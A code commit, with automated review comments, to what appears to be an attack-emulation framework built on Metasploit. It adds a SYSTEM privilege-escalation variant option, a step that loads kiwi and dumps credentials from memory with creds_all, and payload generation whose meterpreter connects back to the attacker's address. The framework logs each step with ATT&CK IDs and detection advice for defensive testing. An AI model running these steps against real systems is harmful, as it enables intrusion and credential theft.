Fixing Metasploit getsystem

pull/12/head
Thorsten Sick 3 years ago
parent 2100d1ff58
commit 7bce52b02a

@ -471,7 +471,7 @@ class MetasploitInstant(Metasploit):
tactics=tactics, tactics=tactics,
tactics_id=tactics_id, tactics_id=tactics_id,
ttp=ttp) ttp=ttp)
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target, delay=5)
print(f"Result of migrate {res}") print(f"Result of migrate {res}")
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
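Review bot: The post-migration wait on the changed `res = self.meterpreter_execute_on([command], target, delay=5)` line is hard-coded, while the kiwi step added in the same commit reads its wait from `kwargs.get("delay", 10)`; the two steps should be tunable the same way, e.g. `res = self.meterpreter_execute_on([command], target, delay=kwargs.get("delay", 5))`. That assumes this method accepts `**kwargs` like getsystem and kiwi do; its signature and the rest of its body lie outside the hunk, so verify before applying.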
@ -553,19 +553,27 @@ class MetasploitInstant(Metasploit):
result=res) result=res)
return res return res
def getsystem(self, target, **kwargs): def getsystem(self, target, variant=0, **kwargs):
""" Do a network discovery on the target """ """ Do a network discovery on the target
@param target: Target to attack
@param variant: Variant of getsystem to use. 0 is auto, max is 3
"""
command = "getsystem" command = "getsystem"
ttp = "????" # It uses one out of three different ways to elevate privileges. ttp = "????" # It uses one out of three different ways to elevate privileges.
tactics = "Privilege Escalation" tactics = "Privilege Escalation"
tactics_id = "TA0004" tactics_id = "TA0004"
description = """ description = """
Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried: Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:\n
* named pipe impersonation using cmd 0) auto \n
* named pipe impersonation using a dll 1) named pipe impersonation using cmd \n
* token duplication 2) named pipe impersonation using a dll \n
3) token duplication\n
""" """
if variant != 0:
command += f" -t {variant}"
# https://docs.rapid7.com/metasploit/meterpreter-getsystem/ # https://docs.rapid7.com/metasploit/meterpreter-getsystem/
self.attack_logger.vprint( self.attack_logger.vprint(
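Review bot: The new `variant` parameter is interpolated into the meterpreter command on `command += f" -t {variant}"` with no check, although the docstring states the valid range is 0–3 and the plugin hunk below feeds it straight from `self.conf['variant']`; anything outside that range or a non-integer becomes an arbitrary `getsystem -t …` argument that fails on the target side with an unhelpful error. Add a guard before the command is built, e.g. `if variant not in range(0, 4): raise ValueError(f"getsystem variant must be 0-3, got {variant!r}")`, and treat the upper bound as dependent on the installed Metasploit version (newer Meterpreter builds presumably ship further techniques — verify against the version in use). The docstring summary `""" Do a network discovery on the target` is a copy-paste leftover, since the description says the step elevates to SYSTEM; use `""" Elevate privileges on the target to SYSTEM via meterpreter getsystem`. The `ttp = "????"` placeholder could be resolved at the same time: the named-pipe impersonation and token-duplication techniques listed in the description fall under ATT&CK T1134.001 (Access Token Manipulation: Token Impersonation/Theft). getsystem continues past the end of the hunk.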
@ -762,3 +770,59 @@ Uploading new files to the target. Can be config files, tools, implants, ...
logid=logid, logid=logid,
result=res) result=res)
return res return res
def kiwi(self, target, variant="creds_all", **kwargs):
""" Kiwi is the modern equivalent to mimikatz
@param target: target being attacked
@param variant: kiwi command being used
"""
ttp = "t1003"
tactics = "Credential access"
tactics_id = "TA0006"
description = """
Accessing user credentials in memory
"""
res = []
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Preparing for Kiwi{CommandlineColors.ENDC}", 1)
# We need system privileges
self.getsystem(target, 0, **kwargs)
# Kiwi needs to be loaded
command = "load kiwi "
res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10))
# Executing kiwi
command = f"{variant} "
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="kiwi",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description",
None),
countermeasure=kwargs.get("countermeasure", None)
)
res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10))
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
print(res)
return res
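Review bot: `self.getsystem(target, 0, **kwargs)` at the top of kiwi discards the escalation result, so `load kiwi` and the `creds_all` variant still run and are logged as a credential-access step when getsystem failed and the session is still an unprivileged user; the log then records an empty or failed dump with no indication of the cause. Keep the output and check it before continuing, e.g. `elev = self.getsystem(target, 0, **kwargs)` followed by a check for the success marker Meterpreter prints (a "got system" line, presumably what `meterpreter_execute_on` returns here — verify) that emits a warning via `self.attack_logger.vprint` and returns early otherwise. Two smaller points: `ttp = "t1003"` is lower case while `tactics_id = "TA0006"` uses the canonical ATT&CK casing, so any consumer matching on technique IDs needs `"T1003"` (the `creds_all` default reads credentials from LSASS memory, which would be the T1003.001 sub-technique); and the trailing `print(res)` writes the recovered credentials to stdout in addition to the attack log, which looks like leftover debugging output and should be dropped or routed through `self.attack_logger.vprint`.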

@ -4,6 +4,7 @@
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
import socket
class MetasploitGetsystemPlugin(AttackPlugin): class MetasploitGetsystemPlugin(AttackPlugin):
@ -37,12 +38,20 @@ class MetasploitGetsystemPlugin(AttackPlugin):
attacker=self.attacker_machine_plugin, attacker=self.attacker_machine_plugin,
username=self.metasploit_user) username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target, metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
payload_name=payload_name, architecture="x64",
architecture="x64") platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
# TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70
metasploit.getsystem(target, metasploit.getsystem(target,
variant=self.conf['variant'],
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
) )
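Review bot: `variant=self.conf['variant']` raises a KeyError for any existing plugin configuration that predates this option, and the value reaches getsystem unvalidated, where it is interpolated into the meterpreter command line; `variant=self.conf.get('variant', 0)` keeps older configs working with the auto mode, and an `int(...)` conversion or range check here would fail with a clear message instead of a malformed `getsystem -t` invocation on the target. On `ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())`, the lookup runs on the host executing the plugin rather than on the attacker machine; if `get_ip()` can return a hostname, the `lhost` baked into the payload is whatever that name resolves to locally, which is not necessarily the address the target can reach back to — worth a comment or a check that the result is the attacker's reachable interface. The enclosing method continues outside the hunk.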
